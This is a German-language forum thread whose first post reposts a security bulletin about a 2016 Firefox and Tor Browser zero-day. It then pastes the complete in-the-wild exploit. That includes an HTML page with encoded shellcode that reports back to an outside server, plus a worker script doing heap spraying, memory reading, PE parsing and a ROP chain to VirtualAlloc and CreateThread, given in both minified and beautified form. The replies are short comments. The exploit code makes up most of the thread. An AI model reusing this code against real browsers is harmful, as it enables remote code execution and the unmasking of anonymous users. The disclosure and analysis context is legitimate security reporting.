Ergebnis 1 bis 4 von 4
  1. #1
    Registriert seit
    15.11.2007
    Beiträge
    3.200
    Blog-Einträge
    2


    1 out of 1 members found this post helpful. Did you find this post helpful? Yes | No

    Gesetz Firefox Sicherheitslücke Tor browser bundle Javascript exploit

    Emergency Bulletin: Firefox 0 day in the wild. What to do.

    This entry was posted in General Security on November 30, 2016 by mark 18 Replies

    We’re publishing this as an emergency bulletin for our customers and the larger web community. A few hours ago a zero day vulnerability emerged in the Tor browser bundle and the Firefox web browser. Currently it exploits Windows systems with a high success rate and affects Firefox versions 41 to 50 and the current version of the Tor Browser Bundle which contains Firefox 45 ESR.
    If you use Firefox, we recommend you temporarily switch browsers to Chrome, Safari or a non-firefox based browser that is secure until the Firefox dev team can release an update. The vulnerability allows an attacker to execute code on your Windows workstation. The exploit is in the wild, meaning it’s now public and every hacker on the planet has access to it. There is no fix at the time of this writing.
    Currently this exploit causes a workstation report back to an IP address based at OVH in France. But this code can likely be repurposed to infect workstations with malware or ransomware. The exploit code is now public knowledge so we expect new variants of this attack to emerge rapidly.
    This is a watering hole attack, meaning that a victim has to visit a website that contains this exploit code to be attacked. So our forensic team is keeping an eye on compromised WordPress websites and we expect to see this code show up on a few of them during the next few days. An attackers goal would be to compromise workstations of visitors to WordPress websites that have been hacked.
    How this unfolded

    On Tuesday just after noon Pacific time, someone published a 0 day exploit for Firefox and Tor to the tor browser mailing list.

    Since then researcher Dan Guido posted a series of tweets with some analysis of the exploit itself.

    Twitter user @TheWack0lian noticed the shellcode (code that executes on your Windows workstation once exploited) is very similar to shellcode likely used by the FBI back in 2013 to deanonymize visitors to child porn websites hosted by FreedomHosting. The FBI confirmed that they compromised that server and days later it was serving malware that would infect site visitor workstations. The code then reported site visitor real IP addresses, MAC addresses (network card hardware address) and windows computer name to a central server. This code is very similar.

    What we found

    The shell code in this attack calls back to IP address 5.39.27.226, which was a web server hosted at OVH in France. The site is now down. Our own research shows that if you look up this IP address in Shodan, it had an SSL certificate that is a wildcard for the energycdn.com domain name. That site for energycdn is simplistic and according to archive.org, it has not changed since 2014.
    Googling energycdn.com shows that the domain is used frequently to host pirated content. Norton Safe Web reports it hosts viruses. Google Safe Browsing transparency report says the domain hosts malware and redirects to malicious sites.
    One could speculate that the server at 5.39.27.226 was used by energycdn.com as one of their servers to host pirated content. Perhaps the server was compromised by whoever controls energycdn to host that content and then was reinfected by the perpetrator of this new malware variant. But we’re speculating.

    [tor-talk] Javascript exploit

    firstwatch at sigaint.org firstwatch at sigaint.org
    Tue Nov 29 21:55:23 UTC 2016


    This is an Javascript exploit actively used against TorBrowser NOW. It
    consists of one HTML and one CSS file, both pasted below and also
    de-obscured. The exact functionality is unknown but it's getting access to
    "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I
    had to break the "thecode" line in two in order to post, remove ' + ' in
    the middle to restore it.

    HTML:

    <html>
    <head>
    <script>

    var thecode
    ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30 \u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u 3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u52 8b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0 \u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\u ff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3b f8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b \u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u 515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u00 00\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000 \u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u 840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u80 29\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050 \u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u 39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u68 66\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853 \ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\u d775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude 49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6 \u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002
    \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u 8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf3 00\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff \uc085\u840f'
    +
    '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\ u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8 950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5f f\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\ u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue 2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u770 9\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\ u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u8 9cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u000 0\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\ uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u6 14d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc34 9\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u0 2a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u747 0\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\ u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u7 73d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u470 0\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\ u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\
    u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0 000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u000 0\u0000\u0000\u0000\u0000\u0000\u4190';


    var worker = new Worker('cssbanner.js');

    worker.postMessage(thecode);

    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x1000);
    var heap100 = new Array(0x4000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;

    var animateX = undefined;
    var containerA = undefined;

    var offset = 0x90;
    if
    (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent))
    {
    offset = 0x88; // versions 47.0 or greater
    }

    var $ = function(id) { return document.getElementById(id); }

    var exploit = function()
    {
    var u32 = new Uint32Array(block80)
    u32[0x2] = arrBase - offset;
    u32[0x8] = arrBase - offset;
    u32[0xE] = arrBase - offset;


    for(i = heap100.length/2; i < heap100.length; i++)
    {
    heap100[i] = block100.slice(0)
    }

    for(i = 0; i < heap80.length/2; i++)
    {
    heap80[i] = block80.slice(0)
    }

    animateX.setAttribute('begin', '59s')
    animateX.setAttribute('begin', '58s')

    for(i = heap80.length/2; i < heap80.length; i++)
    {
    heap80[i] = block80.slice(0)
    }

    for(i = heap100.length/2; i < heap100.length; i++)
    {
    heap100[i] = block100.slice(0)
    }

    animateX.setAttribute('begin', '10s')
    animateX.setAttribute('begin', '9s')
    window.dump('PAUSING!!! YAYA');
    containerA.pauseAnimations();
    }

    worker.onmessage = function(e)
    {
    worker.onmessage = function(e)
    {
    window.setTimeout(function()
    {
    worker.terminate();

    document.body.innerHTML = '';
    document.getElementsByTagName('head')[0].innerHTML = '';
    document.body.setAttribute('onload', '')
    }, 1000);
    }

    arrBase = e.data;
    exploit();
    }


    var idGenerator = function()
    {
    return 'id' +
    (((1+Math.random())*0x10000)|0).toString(16).subst ring(1);
    }


    var craftDOM = function()
    {
    containerA = document.createElementNS(svgns, 'svg')
    var containerB = document.createElementNS(svgns, 'svg');

    animateX = document.createElementNS(svgns, 'animate')
    var animateA = document.createElementNS(svgns, 'animate')
    var animateB = document.createElementNS(svgns, 'animate')

    var animateC = document.createElementNS(svgns, 'animate')

    var idX = idGenerator();
    var idA = idGenerator();
    var idB = idGenerator();
    var idC = idGenerator();

    animateX.setAttribute('id', idX);
    animateA.setAttribute('id', idA);
    animateA.setAttribute('end', '50s');
    animateB.setAttribute('id', idB);
    animateB.setAttribute('begin', '60s');
    animateB.setAttribute('end', idC + '.end');
    animateC.setAttribute('id', idC);
    animateC.setAttribute('begin', '10s');
    animateC.setAttribute('end', idA + '.end');

    containerA.appendChild(animateX)
    containerA.appendChild(animateA)
    containerA.appendChild(animateB)

    containerB.appendChild(animateC)

    document.body.appendChild(containerA);
    document.body.appendChild(containerB);
    }
    window.onload = craftDOM;
    //
    </script>

    <style>
    #mtdiv{
    position: absolute;
    width: 960px;
    height: 166px;
    z-index: 15;
    top: 100px;
    left: 50%;
    margin: 0 0 0 -480px;
    }
    </style>
    </head>
    <body bgcolor='#2F3236'>

    <div id='mtdiv'>
    <img src='mt.png'/>
    </div>
    </body>
    <script>
    setTimeout('window.location = \'member.php\';', 2000);
    </script>

    </html>

    ================================================== =================================================

    content of "cssbanner.js":

    self.onmessage = function(msg) {

    thecode = msg.data;
    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
    & 65535) + String.fromCharCode(a) };
    function
    Memory(b,a,f){this._base_addr=b;this._read=a;this. _write=f;this._abs_read=function(a){a>=this._base_ addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return
    0>a?4294967295+a+1:a};this._abs_write=function(a,b ){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readBy te=function(a){return
    this.read(a)&255};this.readWord=function(a){return
    this.read(a)&65535};this.readDword=function(a){ret urn this.read(a)};
    this.read=function(a,b){if(a%4){var
    c=this._abs_read(a&4294967292),d=this._abs_read(a+ 4&4294967292),e=a%4;return
    c>>>8*e|d<<8*(4-e)}return
    this._abs_read(a)};this.readStr=function(a){for(va r
    b="",c=0;;){if(32==c)return"";var
    d=this.readByte(a+c);if(0==d)break;b+=String.fromC harCode(d);c++}return
    b};this.write=function(a){}}
    function PE(b,a){this.mem=b;this.export_table=this.module_b ase=void
    0;this.export_table_size=0;this.import_table=void
    0;this.import_table_size=0;this.find_module_base=f unction(a){for(a&=4294901760;a;){if(23117==this.me m.readWord(a))return
    this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){pe File=this.module_base+this.mem.readWord(this.modul e_base+60);if(17744!=this.mem.readDword(peFile))th row"Bad
    NT
    Signature";this.pe_file=peFile;this.optional_heade r=this.pe_file+36;this.export_directory=
    this.module_base+this.mem.readDword(this.pe_file+1 20);this.export_directory_size=this.mem.readDword( this.pe_file+124);this.import_directory=this.modul e_base+this.mem.readDword(this.pe_file+128);this.i mport_directory_size=this.mem.readDword(this.pe_fi le+132)};this.resolve_imported_function=function(a ,b){void
    0==this.import_directory&&this._resolve_pe_structu res();for(var
    e=this.import_directory,c=e+this.import_directory_ size;e<c;){var
    d=this.mem.readStr(this.mem.readDword(e+12)+this.m odule_base);if(a.toUpperCase()==
    d.toUpperCase()){for(var
    c=this.mem.readDword(e)+this.module_base,e=this.me m.readDword(e+16)+this.module_base,d=this.mem.read Dword(c),f=0;0!=d;){if(this.mem.readStr(d+this.mod ule_base+2).toUpperCase()==b.toUpperCase())return
    this.mem.readDword(e+4*f);f++;d=this.mem.readDword (c+4*f)}break}e+=20}return
    0};void 0!=a&&this.find_module_base(a)}
    function ROP(b,a){this.mem=b;this.pe=new
    PE(b,a);this.pe._resolve_pe_structures();this.modu le_base=this.pe.module_base+4096;this.findSequence =function(a){for(var
    b=0;;){for(var
    e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.m odule_base+b+c)==a[c]&&e==c)e++;else
    break;if(e==a.length)return
    this.module_base+b;b++}};this.findStackPivot=funct ion(){return
    this.findSequence([148,195])};this.findPopRet=function(a){return
    this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void
    0!=c?c:new ArrayBuffer(4096);
    c=new Uint32Array(c);var
    d=this.findStackPivot(),f=this.findPopRet("EAX"),g =this.pe.resolve_imported_function("kernel32.dll", "VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return
    c}}
    var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new
    Uint32Array(conv),qword2Double=function(b,a){convu 32[0]=b;convu32[1]=a;return
    convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return
    convu32[a]},sprayArrays=function(){for(var
    b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+
    o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/
    8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+
    (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308);
    var spr=Array(400),arrBase=805306416,ropArrBuf=new
    ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=8 64,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=153 6,oRop=1792,memory=new
    Uint32Array(16),len=memory.length,arr_index=0,arr_ offset=0;fzero=qword2Double(0,0);0!=thecode.length %2&&(thecode+="\u9090");sprayArrays();postMessage( arrBase);
    for(memarrayloc=void 0;void
    0==memarrayloc;)for(i=0;i<spr.length;i++)for(offse t=0;offset<spr[i].length;offset+=512)if("object"!=typeof
    spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;3 3>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+
    o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;) ;var
    mem=new Memory(memarrayloc+48,function(b){return
    memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var
    rop=new
    ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset ,10,ropArrBuf);
    var backupESP=rop.findSequence([137,1,195]),ropChain=new
    Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_fu nction("KERNEL32.dll","CreateThread");for(var
    i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071;
    ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var
    j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+ 1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT
    SUCCESS");

    };


    Beautified:

    self.onmessage =
    function(msg) {

    thecode = msg.data;
    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
    & 65535) + String.fromCharCode(a) };

    function Memory(b,a,f)
    {
    this._base_addr=b;
    this._read=a;
    this._write=f;
    this._abs_read = function(a) {
    a >= this._base_addr ? a = this._read( a - this._base_addr) : (
    a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
    return 0>a?4294967295+a+1:a

    };
    this._abs_write = function(a,b) {
    a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a
    = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
    };
    this.readByte = function(a) {
    return this.read(a) & 255

    };
    this.readWord = function(a) {
    return this.read(a) & 65535
    };
    this.readDword = function(a){ return this.read(a) };
    this.read = function(a,b) {
    if (a%4) {
    var c = this._abs_read( a & 4294967292),
    d = this._abs_read( a+4 & 4294967292),
    e = a%4;
    return c>>>8*e | d<<8*(4-e)
    }
    return this._abs_read(a)
    };
    this.readStr = function(a) {
    for(var b = "", c = 0;;) {
    if (32 == c)
    return "";
    var d = this.readByte(a+c);
    if(0 == d)
    break;
    b += String.fromCharCode(d);
    c++
    }
    return b

    };
    this.write = function(a){}
    }
    function PE(b,a) {
    this.mem = b;
    this.export_table = this.module_base = void 0;
    this.export_table_size = 0;
    this.import_table = void 0;
    this.import_table_size = 0;
    this.find_module_base = function(a) {
    for(a &= 4294901760; a; ) {
    if(23117 == this.mem.readWord(a))
    return this.module_base=a;
    a -= 65536
    }
    };
    this._resolve_pe_structures = function() {
    peFile = this.module_base + this.mem.readWord(this.module_base+60);
    if(17744 != this.mem.readDword(peFile))
    throw"Bad NT Signature";
    this.pe_file = peFile;
    this.optional_header = this.pe_file+36;
    this.export_directory =
    this.module_base+this.mem.readDword(this.pe_file+1 20);
    this.export_directory_size = this.mem.readDword(this.pe_file+124);
    this.import_directory=this.module_base+this.mem.re adDword(this.pe_file+128);
    this.import_directory_size=this.mem.readDword(this .pe_file+132)};
    this.resolve_imported_function=function(a,b){
    void 0==this.import_directory&&this._resolve_pe_structu res();
    for(var
    e=this.import_directory,c=e+this.import_directory_ size;e<c;){
    var
    d=this.mem.readStr(this.mem.readDword(e+12)+this.m odule_base);
    if(a.toUpperCase()==d.toUpperCase()){
    for(var c = this.mem.readDword(e) + this.module_base,
    e = this.mem.readDword(e+16) +
    this.module_base,
    d = this.mem.readDword(c),
    f = 0 ; 0 !=d ;)
    {
    if(this.mem.readStr(d+this.module_base+2).toUpperC ase()
    == b.toUpperCase())
    return this.mem.readDword(e+4*f);
    f++;
    d = this.mem.readDword(c+4*f)
    }
    break
    }
    e+=20
    }
    return 0
    };
    void 0!=a && this.find_module_base(a)
    }
    function ROP(b,a){
    this.mem = b;
    this.pe = new PE(b,a);
    this.pe._resolve_pe_structures();
    this.module_base = this.pe.module_base+4096;
    this.findSequence = function(a) {
    for(var b=0;;) {
    for(var e=0,c=0;c<a.length;c++)
    if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)
    e++;
    else
    break;
    if(e==a.length)
    return this.module_base+b;
    b++

    }

    };
    this.findStackPivot=function() {
    return this.findSequence([148,195])

    };
    this.findPopRet=function(a) {
    return this.findSequence([88,195])

    };
    this.ropChain=function(a,b,e,c) {
    c = void 0 != c ? c : new ArrayBuffer(4096);
    c = new Uint32Array(c);
    var d = this.findStackPivot(),
    f = this.findPopRet("EAX"),
    g =
    this.pe.resolve_imported_function("kernel32.dll"," VirtualAlloc");
    c[0]= f+1;
    c[1]= f;
    c[2]= a+b+4*e+4;
    c[3]= d;
    for(i=0;i<e;i++)
    c[(b>>2)+i] = d;
    d =(b+4>>2)+e;
    c[d++]=g;
    c[d++]=a+(b+4*e+28);
    c[d++]=a;
    c[d++]=4096;
    c[d++]=4096;
    c[d++]=64;
    c[d++]=3435973836;
    return c
    }
    }
    var conv=new ArrayBuffer(8),
    convf64=new Float64Array(conv),
    convu32=new Uint32Array(conv),
    qword2Double=function(b,a) {
    convu32[0]=b;
    convu32[1]=a;
    return convf64[0]
    },
    doubleFromFloat = function(b,a) {
    convf64[0]=b;
    return convu32[a]

    },
    sprayArrays=function() {
    for(var b=Array(262138),a=0;262138>a;a++)
    b[a]=fzero;
    for(a=0;a<b.length;a+=512)
    b[a+1] = memory,
    b[a+21] = qword2Double(0,2),
    b[a+14] = qword2Double(arrBase+o1,0),
    b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
    b[a+(o2+0)/8] = qword2Double(2,0),
    b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
    b[a+(o3+0)/8] = qword2Double(16,0),
    b[a+(o3+24)/8] = qword2Double(2,0),
    b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
    b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
    b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
    b[a+(o6+8)/8] = qword2Double(2,0),
    b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
    b[a+(o7+16)/8] = qword2Double(0,4026531840),
    b[a+(o7+32)/8] = qword2Double(0,3220176896),
    b[a+(o7+48)/8] = qword2Double(2,0),
    b[a+(o7+56)/8] = qword2Double(1,0),
    b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
    b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
    b[a+(o7+168)/8] = qword2Double(0,2),
    b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
    b[a+(o10+0)/8] = qword2Double(2,0),
    b[a+(o10+8)/8] = qword2Double(0,268435456),
    b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
    b[a+(o11+16)/8] = qword2Double(0,4026531840),
    b[a+(o11+32)/8] = qword2Double(0,3220176896),
    b[a+(o11+48)/8] = qword2Double(2,0),
    b[a+(o11+56)/8] = qword2Double(1,0),
    b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
    b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
    b[a+(o11+168)/8] = qword2Double(0,2);
    for(a=0;a<spr.length;a++)
    spr[a]=b.slice(0)
    }, vtable_offset=300;
    /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
    vtable_offset=304 :
    /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)
    && (vtable_offset=308);
    var spr=Array(400),
    arrBase=805306416,
    ropArrBuf=new ArrayBuffer(4096),
    o1=176,
    o2=256,
    o3=768,
    o4=832,
    o5=864,
    o6=928,
    o7=1024,
    o8=1280,
    o9=1344,
    o10=1376,
    o11=1536,
    oRop=1792,
    memory=new Uint32Array(16),
    len=memory.length,
    arr_index=0,
    arr_offset=0;
    fzero=qword2Double(0,0);
    0!=thecode.length%2&&(thecode+="\u9090");
    sprayArrays();
    postMessage(arrBase);
    for(memarrayloc=void 0;void 0==memarrayloc;)
    for(i=0;i<spr.length;i++)
    for(offset=0;offset<spr[i].length;offset+=512)
    if("object" != typeof spr[i][offset+1]) {
    memarrayloc=doubleFromFloat(spr[i][offset+1],0);
    arr_index=i;
    arr_offset=offset;
    spr[i][offset+(o2+0)/8]=qword2Double(65,0);
    spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);
    for(j=0;33>j;j++)
    spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);
    spr[i][offset+(o3+8)/8]=qword2Double(0,0);
    spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);
    spr[i][offset+(o7+168)/8]=qword2Double(0,3);
    spr[i][offset+(o7+88)/8]=qword2Double(0,2);
    break
    }
    for(;memory.length==len;);
    var mem=new Memory(memarrayloc+48,
    function(b){return memory[b/4]},
    function(b,a){memory[b/4]=a}),
    xulPtr=mem.readDword(memarrayloc+12);
    spr[arr_index][arr_offset+1]=ropArrBuf;
    ropPtr=mem.readDword(arrBase+8);
    spr[arr_index][arr_offset+1]=null;
    ropBase=mem.readDword(ropPtr+16);
    var rop=new ROP(mem,xulPtr);
    rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
    var backupESP=rop.findSequence([137,1,195]), ropChain=new
    Uint32Array(ropArrBuf);
    ropChain[0]=backupESP;
    CreateThread=rop.pe.resolve_imported_function("KER NEL32.dll","CreateThread");
    for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
    ropChain[i++]=3296825488;
    ropChain[i++]=2048;
    ropChain[i++]=1347469361;
    ropChain[i++]=1528949584;
    ropChain[i++]=3092271187;
    ropChain[i++]=CreateThread;
    ropChain[i++]=3096498431;
    ropChain[i++]=arrBase+16;
    ropChain[i++]=1955274891;
    ropChain[i++]=280697892;
    ropChain[i++]=704643071;
    ropChain[i++]=2425406428;
    ropChain[i++]=4294957800;
    ropChain[i++]=2425393407;
    for (var j=0;j<thecode.length;j+=2)
    ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+ 1);
    spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
    spr[arr_index][arr_offset+3]=qword2Double(0,256);
    spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
    spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
    spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
    postMessage("GREAT SUCCESS");
    };

  2. #2
    Registriert seit
    13.06.2016
    Beiträge
    1.199
    Blog-Einträge
    2


    Did you find this post helpful? Yes | No

    AW: Firefox Sicherheitslücke Tor browser bundle Javascript exploit

    nur theoretisch oder von praktischem Belang
    https://de.wikipedia.org/wiki/Dodona

  3. #3


    Did you find this post helpful? Yes | No

    AW: Firefox Sicherheitslücke Tor browser bundle Javascript exploit

    Das Problem an sich ist Windoof.
    Jeder glaubt eine eigene Meinung zu haben, nur woher hat er vergessen.
    Medien sind das was man über Religionen sagte, Opium fürs Volk.


  4. #4


    Did you find this post helpful? Yes | No

    AW: Firefox Sicherheitslücke Tor browser bundle Javascript exploit

    Windoof und Java in Kombination war schon immer eine Sicherheitslücke. Den normalen Windoof-Nutzer interessiert das meist nicht, zumal die wenigsten sich echte Gedanken über Sicherheit beim Internet-surfen machen.
    "Mein Vaterland hat allzeit den ersten Anspruch auf mich." (Mozart)

    "Ich habe nur ein Vaterland, das heißt Deutschland." (vom Stein)

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Ähnliche Themen

  1. Antworten: 2
    Letzter Beitrag: 22.07.2016, 17:28
  2. Wie geht das? Manueller Videodownload von YouTube mit FireFox
    Von abandländer im Forum Aktuelles
    Antworten: 2
    Letzter Beitrag: 14.11.2012, 15:36

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Single Sign On provided by vBSSO